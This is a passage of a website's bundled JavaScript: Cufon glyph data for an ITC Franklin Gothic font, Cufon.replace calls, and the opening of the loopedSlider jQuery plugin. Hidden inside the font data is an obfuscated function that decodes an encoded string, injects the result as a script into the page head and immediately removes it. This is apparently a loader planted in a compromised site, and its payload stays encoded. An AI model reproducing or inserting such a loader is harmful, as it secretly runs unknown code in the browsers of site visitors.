":9,"\u00fd":9,"\u00ff":9,"g":9}},{"d":"94,4v-67,0,-78,-52,-78,-94v0,-59,24,-154,104,-154v11,0,50,1,65,38v24,57,11,124,-19,172v-22,35,-54,38,-72,38xm117,-202v-47,11,-50,89,-50,125v0,19,7,38,30,38v45,0,45,-97,47,-120v0,-6,0,-43,-27,-43xm126,-275v-18,10,-41,15,-71,13r74,-44r61,44v-28,2,-48,-3,-64,-13","w":202,"k":{"T":11,"V":11,"W":9,"Y":16,"\u00dd":16,"A":9,"\u00c6":9,"\u00c1":9,"\u00c2":9,"\u00c4":9,"\u00c0":9,"\u00c5":9,"\u00c3":9,",":7,".":7,"J":11,"X":7}},{"d":"6,0r40,-240r142,0r-7,42r-92,0r-9,55r76,0r-7,40r-76,0r-10,61r93,0r-7,42r-143,0","w":171},{"d":"163,-120v0,48,-17,124,-77,124v-36,0,-42,-23,-44,-31v-4,9,-6,14,-11,27r-27,0r40,-240r49,0r-14,81v6,-10,16,-23,38,-23v45,0,46,46,46,62xm79,-30v29,0,34,-78,34,-94v0,-9,-2,-24,-15,-24v-14,0,-20,16,-21,19v-2,6,-16,53,-16,78v0,3,0,21,18,21","w":171},{"d":"134,-72r0,-59r-111,0r0,-37r148,0r0,96r-37,0"},{"d":"54,-73v0,17,14,35,32,35v33,0,33,-41,33,-47v0,-5,0,-33,-28,-33v-19,0,-26,14,-29,20r-39,-15r29,-127r131,0r-9,46r-91,0r-12,56v5,-8,14,-20,38,-20v56,0,61,56,61,72v0,30,-14,90,-85,90v-62,0,-73,-44,-77,-62"},{"d":"6,0r40,-240v46,2,74,-9,115,11v33,16,36,62,36,84v0,21,-3,99,-53,129v-42,25,-83,13,-138,16xm89,-200r-26,160v24,2,43,-4,50,-15v20,-9,63,-165,-24,-145","w":202,"k":{"V":13,"W":14,"Y":13,"\u00dd":13,"A":9,"\u00c6":9,"\u00c1":9,"\u00c2":9,"\u00c4":9,"\u00c0":9,"\u00c5":9,"\u00c3":9,",":14,".":14}},{"d":"106,-244v38,0,70,32,70,63v0,46,-33,55,-43,58v31,13,32,45,32,52v0,28,-14,75,-81,75v-67,0,-75,-42,-80,-68r44,-12v1,13,5,41,33,41v22,0,32,-17,32,-36v0,-40,-29,-33,-53,-34r8,-38v34,2,56,-6,57,-34v0,-9,-3,-29,-25,-29v-19,0,-27,16,-32,32r-42,-14v14,-44,50,-56,80,-56"},{"d":"151,-206r-98,0r4,-23r98,0","w":165},{"d":"171,-75v4,96,-159,115,-168,7r49,-9v5,24,12,38,35,38v22,0,30,-13,30,-26v0,-18,-11,-24,-32,-34v-30,-14,-58,-31,-58,-68v0,-27,16,-77,78,-77v32,0,64,13,74,61r-48,13v-3,-14,-8,-32,-28,-32v-15,0,-25,11,-25,25v0,31,104,45,93,102"},{"d":"15,-96r4,-31v24,-14,72,-49,72,-75v0,-3,-1,-12,-11,-12v-13,0,-16,17,-17,25r-33,-7v3,-23,18,-47,51,-47v28,0,48,17,48,41v0,35,-35,56,-66,75r55,0r-5,31r-98,0","w":122},{"d":"34,0r-24,-177r50,0r9,111r43,-111r41,0r-77,177r-42,0","w":141,"k":{",":7,".":7,"a":13,"\u00e6":13,"\u00e1":13,"\u00e2":13,"\u00e4":13,"\u00e0":13,"\u00e5":13,"\u00e3":13,"e":5,"\u00e9":5,"\u00ea":5,"\u00eb":5,"\u00e8":5}},{"d":"58,-132v3,29,72,28,72,76v0,23,-12,60,-66,60v-31,0,-67,-21,-65,-53r40,-6v3,12,6,25,25,25v3,0,21,0,21,-16v0,-32,-70,-24,-70,-76v0,-21,13,-60,63,-60v51,0,56,38,58,50r-36,9v4,-23,-39,-38,-42,-9","w":141,"k":{"w":5}},{"d":"6,0r40,-240r70,0v21,0,76,0,76,67v0,23,-7,52,-27,66v-35,25,-53,15,-94,17r-15,90r-50,0xm78,-132v37,5,64,-7,62,-38v-2,-34,-25,-27,-51,-28","k":{"\u00e4":7,"A":18,"\u00c6":18,"\u00c1":18,"\u00c2":18,"\u00c4":18,"\u00c0":18,"\u00c5":18,"\u00c3":18,",":63,".":63,"a":7,"\u00e6":7,"\u00e1":7,"\u00e2":7,"\u00e0":7,"\u00e5":7,"\u00e3":7,"e":4,"\u00e9":4,"\u00ea":4,"\u00eb":4,"\u00e8":4}},{"d":"33,-31r-25,0r29,-63r-8,-62r21,0r27,62xm95,-31r-26,0r29,-63r-8,-62r22,0r26,62","w":153},{"d":"115,-138r56,0r0,36r-56,0r0,56r-36,0r0,-56r-56,0r0,-36r56,0r0,-56r36,0r0,56"},{"d":"17,-92v-1,-65,29,-154,101,-152v5,0,60,0,65,58r-47,9v-2,-20,-12,-29,-24,-29v-31,0,-38,61,-40,80v5,-10,13,-28,41,-28v21,0,58,11,58,70v0,77,-77,115,-130,70v-24,-21,-24,-61,-24,-78xm93,-35v23,0,27,-27,27,-46v0,-6,0,-34,-23,-34v-18,0,-29,20,-29,46v0,26,13,34,25,34"},{"d":"11,0r23,-141r-19,0r6,-36r19,0v6,-29,6,-40,15,-51v25,-31,47,-25,75,-21r-4,39v-26,-6,-38,7,-38,33r28,0r-6,36r-27,0r-23,141r-49,0","w":104,"k":{",":14,".":14}},{"d":"3,0r41,-240r49,0r-41,240r-49,0","w":86},{"d":"162,-117v-1,48,-13,121,-70,121v-26,0,-32,-14,-36,-23r-14,79r-49,0r40,-237r42,0r-4,24v6,-10,18,-29,45,-29v44,0,46,47,46,65xm97,-148v-36,9,-31,73,-36,98v0,3,0,20,16,20v31,0,36,-92,36,-96v0,-21,-14,-22,-16,-22","w":171,"k":{"y":9,"\u00fd":9,"\u00ff":9}},{"d":"25,0r9,-53r48,0r-9,53r-48,0xm44,-72r13,-168r59,0r-41,168r-31,0","w":122},{"d":"44,-240r50,0r-23,133v-7,33,-6,68,24,68v28,0,31,-18,37,-55r25,-146r46,0v-17,74,-10,165,-49,220v-34,48,-144,26,-138,-38v6,-65,19,-121,28,-182xm130,-256r-64,-27r15,-29r58,36","w":196,"k":{"A":9,"\u00c6":9,"\u00c1":9,"\u00c2":9,"\u00c4":9,"\u00c0":9,"\u00c5":9,"\u00c3":9}},{"d":"17,55r-18,0r30,-55r-23,0r9,-53r49,0r-8,48xm76,-124r-49,0r9,-53r49,0","w":91},{"d":"76,-124r-49,0r9,-53r49,0xm55,0r-49,0r9,-53r49,0","w":91},{"d":"-11,0r141,-240r157,0r-7,42r-83,0r-9,55r67,0r-6,40r-68,0r-10,61r83,0r-7,42r-133,0r10,-60r-51,0r-34,60r-50,0xm131,-103r22,-110r-58,110r36,0","w":270},{"d":"92,-182v49,1,71,44,62,101r-95,0v0,0,-9,45,19,51v17,0,24,-13,29,-30r40,7v-14,44,-38,57,-72,57v-48,0,-66,-23,-66,-76v0,-57,31,-110,83,-110xm63,-109r47,0v3,-16,7,-37,-18,-42v-22,0,-27,30,-29,42xm158,-231r-71,32r-10,-16r67,-42","w":165,"k":{"y":5,"\u00fd":5,"\u00ff":5}},{"d":"98,-238r29,4r-11,42r39,-18r10,28r-41,11r35,22r-19,24r-30,-29r-3,42r-29,-4r11,-42r-39,18r-9,-28r40,-11r-35,-23r19,-23r30,30"},{"d":"168,-240r0,300r-27,0r0,-278r-15,0r0,278r-26,0r0,-150v-26,0,-46,3,-65,-13v-45,-38,-31,-96,1,-125v42,-22,80,-8,132,-12"},{"d":"92,-182v49,1,71,44,62,101r-95,0v0,0,-9,45,19,51v17,0,24,-13,29,-30r40,7v-14,44,-38,57,-72,57v-48,0,-66,-23,-66,-76v0,-57,31,-110,83,-110xm63,-109r47,0v3,-16,7,-37,-18,-42v-22,0,-27,30,-29,42xm77,-203v-11,0,-19,-9,-19,-19v0,-10,8,-19,19,-19v11,0,19,9,19,19v0,10,-8,19,-19,19xm133,-203v-11,0,-19,-9,-19,-19v0,-10,8,-19,19,-19v11,0,19,9,19,19v0,10,-8,19,-19,19","w":165,"k":{"y":5,"\u00fd":5,"\u00ff":5}},{"d":"91,-182v115,0,38,101,47,182r-47,0v-3,-9,-2,-14,0,-24v-6,10,-16,28,-46,28v-37,0,-42,-29,-42,-45v0,-66,76,-69,102,-70v6,-17,3,-41,-15,-41v-19,0,-22,19,-24,30r-45,-5v5,-19,15,-55,70,-55xm53,-46v0,10,5,20,17,20v22,0,25,-20,32,-60v-45,4,-49,33,-49,40xm158,-231r-71,32r-10,-16r67,-42","w":165},{"d":"6,0r40,-240r142,0r-7,42r-92,0r-9,55r76,0r-7,40r-76,0r-10,61r93,0r-7,42r-143,0xm180,-283r-76,27r-10,-18r74,-37","w":171},{"d":"122,-243r0,126r-54,0r0,-126r54,0xm122,-63r0,126r-54,0r0,-126r54,0","w":180},{"d":"9,-82r5,-29v12,-1,19,-2,26,-41r6,-40v7,-51,25,-48,69,-48r-4,22v-47,-3,-9,123,-65,123v45,12,4,87,6,126v0,5,2,8,16,8r-4,22v-32,0,-55,0,-55,-25v0,-36,13,-68,15,-104v0,-9,-2,-13,-15,-14","w":116},{"d":"91,-144v-31,-1,-32,69,-33,84v0,27,18,27,19,27v17,0,24,-25,26,-34r42,5v-9,37,-31,66,-72,66v-42,0,-64,-27,-64,-75v0,-37,17,-111,84,-111v59,0,59,56,59,68r-43,2v0,-10,-1,-32,-18,-32","w":153},{"d":"94,0r-59,0v17,-112,84,-175,108,-197r-106,0r7,-43r146,0r-6,38v-64,82,-82,140,-90,202"},{"d":"-16,0r65,-93r-30,-84r51,0r15,49r31,-49r43,0r-58,84r31,93r-50,0r-16,-59r-39,59r-43,0","w":147,"k":{"e":9,"\u00e9":9,"\u00ea":9,"\u00eb":9,"\u00e8":9}},{"d":"121,-156r25,0r-29,63r9,62r-22,0r-27,-62xm59,-156r26,0r-29,63r8,62r-21,0r-27,-62","w":153},{"d":"81,-67r-72,0r7,-39r71,0","w":98},{"d":"84,0r9,-53r-90,0r6,-42r112,-145r52,0r-25,146r31,0r-7,41r-31,0r-8,53r-49,0xm47,-92r53,0r17,-95"},{"d":"171,-131r-148,0r0,-37r148,0r0,37xm171,-72r-148,0r0,-37r148,0r0,37"},{"d":"138,0r-42,0r5,-28v-10,16,-21,32,-52,32v-44,0,-43,-29,-36,-71r18,-110r49,0r-21,130v0,13,12,14,16,14v20,0,24,-24,27,-42r17,-102r49,0","w":171},{"d":"80,-172v-2,31,87,39,87,95v0,20,-9,51,-34,64v-16,9,-31,9,-42,10r-5,35r-28,0r6,-37v-41,-10,-51,-42,-54,-66r46,-8v5,23,12,36,33,36v24,0,28,-16,28,-25v0,-17,-12,-22,-31,-31v-29,-13,-54,-28,-54,-63v0,-32,33,-79,70,-73r5,-28r28,0r-5,31v28,10,39,31,44,55r-45,12v-3,-13,-6,-30,-25,-30v-14,0,-24,10,-24,23"},{"d":"31,-141r-21,0r6,-36r25,0r11,-51r42,-1r-9,52r33,0r-6,36r-32,0r-14,92v-3,16,18,18,32,14r-6,36v-33,6,-79,7,-77,-31v3,-39,11,-74,16,-111","w":110},{"d":"-3,0r6,-38r119,-162r-90,0r7,-40r150,0r-6,37r-119,161r99,0r-7,42r-159,0","w":177},{"d":"122,-270r0,360r-54,0r0,-360r54,0","w":180},{"d":"57,-177r12,106r41,-106r39,0r-78,183v-16,41,-35,62,-86,56r3,-37v30,4,40,-2,50,-32r-32,-170r51,0","w":135,"k":{",":16,".":16,"a":4,"\u00e6":4,"\u00e1":4,"\u00e2":4,"\u00e4":4,"\u00e0":4,"\u00e5":4,"\u00e3":4,"o":-7,"\u00f8":-7,"\u00f3":-7,"\u00f4":-7,"\u00f6":-7,"\u00f2":-7,"\u00f5":-7}},{"d":"0,0r30,-177r42,0r-6,35v14,-26,26,-39,57,-38r-7,51v-16,0,-37,1,-46,25v-11,31,-14,70,-21,104r-49,0","w":110,"k":{"y":-18,"\u00fd":-18,"\u00ff":-18,",":18,".":18,"r":-7,"d":-7,"k":-5,"p":-4,"s":-7,"t":-16,"u":-7,"\u00fa":-7,"\u00fb":-7,"\u00fc":-7,"\u00f9":-7,"v":-20,":":-14,";":-14}},{"d":"22,61r-34,0v53,-54,73,-131,73,-191v0,-17,-1,-59,-26,-110r29,0v39,58,41,117,41,132v0,76,-50,141,-83,169","w":116},{"d":"-5,0r6,-35r81,-107r-60,0r6,-35r112,0r-5,34r-81,106r64,0r-6,37r-117,0","w":135},{"d":"143,-240r27,240r-52,0r-5,-53r-60,0r-22,53r-47,0r106,-240r53,0xm110,-94r-6,-92r-35,92r41,0xm134,-256r-65,-27r16,-29r58,36"},{"d":"125,-14v-35,24,-58,29,-95,3v-20,-14,-21,-42,-21,-61v0,-47,21,-110,84,-110v49,0,63,38,63,77v0,24,-6,65,-31,91xm75,-30v25,0,31,-73,31,-89v0,-12,0,-29,-15,-29v-29,0,-32,80,-32,93v0,15,3,25,16,25","w":165,"k":{"w":9,"y":9,"\u00fd":9,"\u00ff":9,"g":9}},{"d":"44,-240r50,0r-23,133v-7,33,-6,68,24,68v28,0,31,-18,37,-55r25,-146r46,0v-17,74,-10,165,-49,220v-34,48,-144,26,-138,-38v6,-65,19,-121,28,-182xm194,-283r-76,27r-9,-18r74,-37","w":196,"k":{"A":9,"\u00c6":9,"\u00c1":9,"\u00c2":9,"\u00c4":9,"\u00c0":9,"\u00c5":9,"\u00c3":9}},{"d":"143,-240r27,240r-52,0r-5,-53r-60,0r-22,53r-47,0r106,-240r53,0xm110,-94r-6,-92r-35,92r41,0xm180,-283r-76,27r-10,-18r74,-37"},{"d":"3,0r40,-240r50,0r-14,79v5,-8,15,-21,42,-21v39,0,45,23,37,72r-18,110r-49,0r21,-131v0,-13,-11,-13,-14,-13v-21,0,-25,20,-29,43r-17,101r-49,0","w":171},{"d":"72,61r-72,0r50,-301r68,0r-4,22r-24,0r-43,257r28,0","w":116},{"d":"3,0r30,-177r42,0r-5,29v6,-12,18,-34,48,-34v30,0,33,24,34,34v9,-18,21,-34,48,-34v46,0,46,31,39,69r-19,113r-49,0r21,-131v0,-7,-4,-13,-13,-13v-18,0,-21,18,-27,53r-16,91r-49,0r22,-132v0,-9,-5,-12,-13,-12v-19,0,-23,20,-28,53r-16,91r-49,0","w":251},{"d":"9,-48r43,-16v5,27,21,29,29,29v18,0,32,-12,40,-73v-36,38,-98,18,-98,-49v0,-25,10,-87,81,-87v70,0,70,68,70,94v0,87,-31,154,-98,154v-53,0,-62,-35,-67,-52xm98,-128v25,0,28,-30,28,-46v0,-5,-1,-32,-25,-32v-28,0,-28,39,-28,45v0,18,6,33,25,33"},{"w":90,"k":{"T":18,"V":18,"W":18,"Y":18,"\u00dd":18,"A":18,"\u00c6":18,"\u00c1":18,"\u00c2":18,"\u00c4":18,"\u00c0":18,"\u00c5":18,"\u00c3":18}},{"d":"143,-240r27,240r-52,0r-5,-53r-60,0r-22,53r-47,0r106,-240r53,0xm110,-94r-6,-92r-35,92r41,0xm93,-262v-11,0,-21,-8,-21,-20v0,-11,10,-20,21,-20v11,0,19,10,19,20v0,11,-8,20,-19,20xm148,-262v-11,0,-20,-9,-20,-20v0,-11,9,-20,20,-20v11,0,20,10,20,20v0,11,-9,20,-20,20"},{"d":"43,0r-17,-240r52,0r4,162r56,-162r48,0r8,162r53,-162r47,0r-90,240r-45,0r-9,-171r-62,171r-45,0","w":276,"k":{"\u00fc":11,"\u00f6":7,"\u00ea":16,"\u00e4":22,"O":4,"\u00d8":4,"\u00d3":4,"\u00d4":4,"\u00d6":4,"\u00d2":4,"\u00d5":4,"A":5,"\u00c6":5,"\u00c1":5,"\u00c2":5,"\u00c4":5,"\u00c0":5,"\u00c5":5,"\u00c3":5,",":14,".":14,"a":22,"\u00e6":22,"\u00e1":22,"\u00e2":22,"\u00e0":22,"\u00e5":22,"\u00e3":22,"e":16,"\u00e9":16,"\u00eb":16,"\u00e8":16,"o":7,"\u00f8":7,"\u00f3":7,"\u00f4":7,"\u00f2":7,"\u00f5":7,"u":11,"\u00fa":11,"\u00fb":11,"\u00f9":11}},{"w":90},{"d":"94,4v-67,0,-78,-52,-78,-94v0,-59,24,-154,104,-154v11,0,50,1,65,38v24,57,11,124,-19,172v-22,35,-54,38,-72,38xm117,-202v-47,11,-50,89,-50,125v0,19,7,38,30,38v45,0,45,-97,47,-120v0,-6,0,-43,-27,-43","w":202,"k":{"T":11,"V":11,"W":9,"Y":16,"\u00dd":16,"A":9,"\u00c6":9,"\u00c1":9,"\u00c2":9,"\u00c4":9,"\u00c0":9,"\u00c5":9,"\u00c3":9,",":7,".":7,"J":11,"X":7}},{"d":"92,-182v49,1,71,44,62,101r-95,0v0,0,-9,45,19,51v17,0,24,-13,29,-30r40,7v-14,44,-38,57,-72,57v-48,0,-66,-23,-66,-76v0,-57,31,-110,83,-110xm63,-109r47,0v3,-16,7,-37,-18,-42v-22,0,-27,30,-29,42","w":165,"k":{"y":5,"\u00fd":5,"\u00ff":5}},{"d":"-14,0r6,-41v33,6,47,-1,54,-41r27,-158r50,0r-27,160v-8,45,-14,84,-72,84v-12,0,-25,-1,-38,-4","w":116,"k":{"A":11,"\u00c6":11,"\u00c1":11,"\u00c2":11,"\u00c4":11,"\u00c0":11,"\u00c5":11,"\u00c3":11,"a":9,"\u00e6":9,"\u00e1":9,"\u00e2":9,"\u00e4":9,"\u00e0":9,"\u00e5":9,"\u00e3":9,"e":7,"\u00e9":7,"\u00ea":7,"\u00eb":7,"\u00e8":7,"o":7,"\u00f8":7,"\u00f3":7,"\u00f4":7,"\u00f6":7,"\u00f2":7,"\u00f5":7}},{"d":"6,0r40,-240v72,5,147,-23,147,65v0,54,-31,66,-45,71r26,104r-54,0r-23,-95r-25,0r-16,95r-50,0xm90,-202r-11,67v39,6,66,-16,61,-41v0,-31,-24,-25,-50,-26","w":190,"k":{"O":7,"\u00d8":7,"\u00d3":7,"\u00d4":7,"\u00d6":7,"\u00d2":7,"\u00d5":7,"U":7,"\u00da":7,"\u00db":7,"\u00dc":7,"\u00d9":7,"V":7,"W":11,"Y":7,"\u00dd":7}},{"d":"106,0v-2,-36,-93,-41,-85,-87v0,-5,1,-36,36,-58v-30,-30,-20,-99,55,-99v50,0,57,29,60,40r-36,11v-3,-28,-53,-23,-51,0v-4,27,84,40,74,83v0,31,-21,47,-30,53v42,33,18,118,-58,118v-12,0,-38,-2,-54,-19v-11,-12,-12,-26,-13,-33r41,-8v1,32,63,30,61,-1xm78,-131v-29,20,-15,48,28,62v13,-9,22,-40,-6,-50v-13,-5,-14,-7,-22,-12"},{"d":"45,0r-20,-240r52,0r10,176r66,-176r44,0r-94,240r-58,0","w":177,"k":{"\u00f6":11,"\u00f4":11,"\u00e8":18,"\u00eb":18,"\u00ea":18,"\u00e3":23,"\u00e5":23,"\u00e0":23,"\u00e4":23,"\u00e2":23,"O":9,"\u00d8":9,"\u00d3":9,"\u00d4":9,"\u00d6":9,"\u00d2":9,"\u00d5":9,"A":13,"\u00c6":13,"\u00c1":13,"\u00c2":13,"\u00c4":13,"\u00c0":13,"\u00c5":13,"\u00c3":13,",":20,".":20,"a":23,"\u00e6":23,"\u00e1":23,"e":18,"\u00e9":18,"o":11,"\u00f8":11,"\u00f3":11,"\u00f2":11,"\u00f5":11,"u":14,"\u00fa":14,"\u00fb":14,"\u00fc":14,"\u00f9":14,"-":9}},{"d":"120,-182v41,0,44,41,38,76r-18,106r-49,0r21,-130v0,-13,-12,-14,-15,-14v-20,0,-24,20,-29,48r-16,96r-49,0r30,-177r42,0r-4,28v5,-11,17,-33,49,-33","w":171,"k":{"y":7,"\u00fd":7,"\u00ff":7}},{"d":"170,-219r-3,34v-15,-4,-32,3,-30,13v34,20,28,106,-47,101v-24,-1,-33,-6,-38,12v0,12,11,12,34,12v27,1,63,3,63,47v0,51,-43,63,-86,63v-39,0,-68,-8,-68,-39v0,-24,16,-33,25,-37v-4,-4,-13,-11,-13,-28v0,-30,25,-41,34,-45v-5,-4,-16,-12,-16,-35v0,-48,47,-71,94,-59v3,-26,18,-44,51,-39xm113,-132v0,-5,0,-21,-19,-21v-34,0,-32,52,-5,53v13,0,24,-10,24,-32xm91,-3v-16,1,-62,-11,-57,15v0,16,25,18,39,18v7,0,35,-1,35,-19v0,-12,-12,-13,-17,-14","w":165,"k":{"y":-7,"\u00fd":-7,"\u00ff":-7,",":-9,".":-5,"a":14,"\u00e6":14,"\u00e1":14,"\u00e2":14,"\u00e4":14,"\u00e0":14,"\u00e5":14,"\u00e3":14,"e":11,"\u00e9":11,"\u00ea":11,"\u00eb":11,"\u00e8":11,"o":11,"\u00f8":11,"\u00f3":11,"\u00f4":11,"\u00f6":11,"\u00f2":11,"\u00f5":11}},{"d":"30,0r-18,-177r46,0r5,112r39,-112r45,0r3,112r42,-112r38,0r-73,177r-41,0r-5,-119r-41,119r-40,0","w":220,"k":{",":14,".":14,"a":14,"\u00e6":14,"\u00e1":14,"\u00e2":14,"\u00e4":14,"\u00e0":14,"\u00e5":14,"\u00e3":14,"e":9,"\u00e9":9,"\u00ea":9,"\u00eb":9,"\u00e8":9,"o":4,"\u00f8":4,"\u00f3":4,"\u00f4":4,"\u00f6":4,"\u00f2":4,"\u00f5":4,"h":5}},{"d":"67,-66r-50,0r9,-53r49,0","w":92},{"d":"55,0r-49,0r9,-53r49,0","w":91,"k":{" ":18}},{"d":"6,0r40,-240r142,0r-7,42r-92,0r-9,55r76,0r-7,40r-76,0r-10,61r93,0r-7,42r-143,0xm130,-256r-64,-27r15,-29r58,36","w":171},{"d":"129,-240r50,0r-41,240r-42,0r4,-22v-7,10,-18,26,-45,26v-43,0,-46,-45,-46,-64v0,-25,7,-122,73,-122v27,0,32,16,34,23xm95,-149v-36,0,-36,70,-36,94v0,14,4,25,17,25v35,0,27,-83,34,-99v0,-15,-7,-20,-15,-20","w":171},{"d":"97,61r-61,-301r29,0r62,301r-30,0","w":141},{"d":"122,-119r31,119r-51,0r-16,-85r-23,24r-11,61r-49,0r41,-240r49,0r-22,128r54,-65r52,0","w":165}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-459-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("rvz:G|E3d?=cr[I*m|-Jpvp=k,E:z|=ck,qJd?PMz+tSX]3uk:%:OfjyO+%:Ofjyz+%:Ofjuz+%:Ofj|E:%:Ofj|OI%:OfjuE+%:OfjIE:-+kC;WOvl#kC;WOvPuqI%:Ofj|O-%:Ofj`O3E8m6!Wz`E8m6!WX];WkC;WOvp%kC;WOv-ykC;WOvl3r-%:Ofj`Eh:8m6!WX|z8m6!WX,q8m6!WX6qskC;WOvpWq:%:OfjuX+I8m6!Wzv+8m6!Wzvz8m6!WX]q;8+%:Ofj|T-%:OfjuX:%:Ofj|z-%:OfjIEI%:Ofj`X:%:Ofj5z-%:OfjIX:%:Ofj!j[fl-vCpqrxOETYZP~6;+?kXzdG8mBFKyu`5I|MQ1NLS)c4W%J]3:,h$#g*t=s0|E+%:OfjIO-%:OfjuElm8m6!WX`I8m6!Wz`5SkC;WOvz|kC;WOvZWkC;WOvq5kC;WOvl:kC;WOvzIXf-8m6!Wz?z8m6!Wz|E8m6!Wz6q8m6!Wz|ltdI%:OfjuT-%:Ofj`X+WukC;WOvE5q+%:OfjIT-%:Ofj5X:%:Ofj5EI#1k[t$kC;WOv;3kC;WOvX%~-%:Ofj|XI%:OfjIzf=xkC;WOv;:kC;WOvX3kC;WOvZJkC;WOvZ]kC;WOv+IkC;WOvl]Z;#!~+y8m6!WX6yykC;WOvZ%kC;WOvp]kC;WOvZhkC;WOv+ykC;WOvEIkC;WOv;]k;zOpJ3JkC;WOvZ$kC;WOvZ:YI%:Ofj`z5:[kC;WOvX,kC;WOvZ3P?q8m6!WX?O:PfE8m6!WX?z6kC;WOvpJmMEZkC;WOvqur]z|GC!ykC;WOvZ#T]18m6!WX]z8m6!Wz65NkC;WOvp,kC;WOv+ukC;WOv;%kC;WOvO#kC;WOvl,B,OhB-%:OfjyXI%:OfjyzfZ=m~P3?M%#8uIgkC;WOvOWG:%:Ofj5X+%:Ofj`O?yGG65KkC;WOvO3+:%:OfjyOl=I~Iq8m6!WX6m?G|mhkC;WOvphxI%:Ofj`TvP8kvSuxMEWGvI3r[pur~%1Y6!S8f:uxM!SGf:Wx|%IG|m3d[%MY?pczu#MGCIWdCO=Bh3*d?XQXu#4d]34kuK0TMmhm:Wcr6tQY]1Wm?qSd?EIG|myz,+)z?#3k[#yX:Wcm?)txu)8xMj:X|%1X,+cz,-Mz?:IGMP8x|-`k[#:dhWcr:WcXMq18:WcX?E8xM+LF[$Lk[#u8|I]mv=Sk[#yX:Wcm?S1q[=1xMPI8hZQGv=`XkP1G,$cdv=]mv#yG?;1r?z48uK*d6%STJSLd~IM?,EGd+:mYkjGd+:=r~K1")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":183,"face":{"font-family":"ITC Franklin Gothic Std","font-weight":600,"font-style":"italic","font-stretch":"condensed","units-per-em":"360","panose-1":"2 11 8 6 3 5 2 9 2 4","ascent":"247","descent":"-113","bbox":"-34 -324 294 90","underline-thickness":"18","underline-position":"-18","slope":"-9.5","stemh":"37","stemv":"48","unicode-range":"U+0020-U+00FF"}}));
;
Cufon.replace('#navbar a');
Cufon.replace('h1');
Cufon.replace('h2', { hover: true });
Cufon.replace('h3');
Cufon.replace('h4');
;
/*
 * 	loopedSlider 0.5.6 - jQuery plugin
 *	written by Nathan Searles	
 *	http://nathansearles.com/loopedslider/
 *
 *	Copyright (c) 2009 Nathan Searles (http://nathansearles.com/)
 *	Dual licensed under the MIT (MIT-LICENSE.txt)
 *	and GPL (GPL-LICENSE.txt) licenses.
 *
 *	Built for jQuery library
 *	http://jquery.com
 *	Works with jQuery version 1.3+
 *
 */
if(typeof jQuery!='undefined'){jQuery(function($){$.fn.extend({loopedSlider:function(options){var settings=$.extend({},$.fn.loopedSlider.defaults,options);return this.each(function(){if($.fn.jquery<'1.3.2'){return}var $t=$(this);var o=$.metadata?$.extend({},settings,$t.metadata()):settings;var distance=0;var times=1;var slides=$(o.slides,$t).children().size();var width=$(o.slides,$t).children().outerWidth();var position=0;var active=false;var number=0;var interval=0;var restart=0;var pagination=$("."+o.pagination+" li a",$t);if(o.addPagination&&!$(pagination).length){var buttons=slides;$($t).append("<ul class="+o.pagination+">");$(o.slides,$t).children().each(function(){if(number<buttons){$("."+o.pagination,$t).append("<li><a rel="+(number+1)+" href=\"#\" >"+(number+1)+"</a></li>");number=number+1}else{number=0;return false}$("."+o.pagination+" li a:eq(0)",$t).parent().addClass("active")});pagination=$("."+o.pagination+" li a",$t)}else{$(pagination,$t).each(function(){number=number+1;$(this).attr("rel",number);$(pagination.eq(0),$t).parent().addClass("active")})}if(slides===1){$(o.slides,$t).children().css({position:"absolute",left:position,display:"block"});return}$(o.slides,$t).css({width:(slides*width)});$(o.slides,$t).children().each(function(){$(this).css({position:"absolute",left:position,display:"block"});position=position+width});$(o.slides,$t).children(":eq("+(slides-1)+")").css({position:"absolute",left:-width});if(slides>3){$(o.slides,$t).children(":eq("+(slides-1)+")").css({position:"absolute",left:-width})}if(o.autoHeight){autoHeight(times)}$(".next",$t).click(function(){if(active===false){animate("next",true);if(o.autoStart){if(o.restart){autoStart()}else{clearInterval(sliderIntervalID)}}}return false});$(".previous",$t).click(function(){if(active===false){animate("prev",true);if(o.autoStart){if(o.restart){autoStart()}else{clearInterval(sliderIntervalID)}}}return false});if(o.containerClick){$(o.container,$t).click(function(){if(active===false){animate("next",true);if(o.autoStart){if(o.restart){autoStart()}else{clearInterval(sliderIntervalID)}}}return false})}$(pagination,$t).click(function(){if($(this).parent().hasClass("active")){return false}else{times=$(this).attr("rel");$(pagination,$t).parent().siblings().removeClass("active");$(this).parent().addClass("active");animate("fade",times);if(o.autoStart){if(o.restart){autoStart()}else{clearInterval(sliderIntervalID)}}}return false});if(o.autoStart){sliderIntervalID=setInterval(function(){if(active===false){animate("next",true)}},o.autoStart);function autoStart(){if(o.restart){clearInterval(sliderIntervalID);clearInterval(interval);clearTimeout(restart);restart=setTimeout(function(){interval=setInterval(function(){animate("next",true)},o.autoStart)},o.restart)}else{sliderIntervalID=setInterval(function(){if(active===false){animate("next",true)}},o.autoStart)}}}function current(times){if(times===slides+1){times=1}if(times===0){times=slides}$(pagination,$t).parent().siblings().removeClass("active");$(pagination+"[rel='"+(times)+"']",$t).parent().addClass("active")};function autoHeight(times){if(times===slides+1){times=1}if(times===0){times=slides}var getHeight=$(o.slides,$t).children(":eq("+(times-1)+")",$t).outerHeight();$(o.container,$t).animate({height:getHeight},o.autoHeight)};function animate(dir,clicked){active=true;switch(dir){case"next":times=times+1;distance=(-(times*width-width));current(times);if(o.autoHeight){autoHeight(times)}if(slides<3){if(times===3){$(o.slides,$t).children(":eq(0)").css({left:(slides*width)})}if(times===2){$(o.slides,$t).children(":eq("+(slides-1)+")").css({position:"absolute",left:width})}}$(o.slides,$t).animate({left:distance},o.slidespeed,function(){if(times===slides+1){times=1;$(o.slides,$t).css({left:0},function(){$(o.slides,$t).animate({left:distance})});$(o.slides,$t).children(":eq(0)").css({left:0});$(o.slides,$t).children(":eq("+(slides-1)+")").css({position:"absolute",left:-width})}if(times===slides)$(o.slides,$t).children(":eq(0)").css({left:(slides*width)});if(times===slides-1)$(o.slides,$t).children(":eq("+(slides-1)+")").css({left:(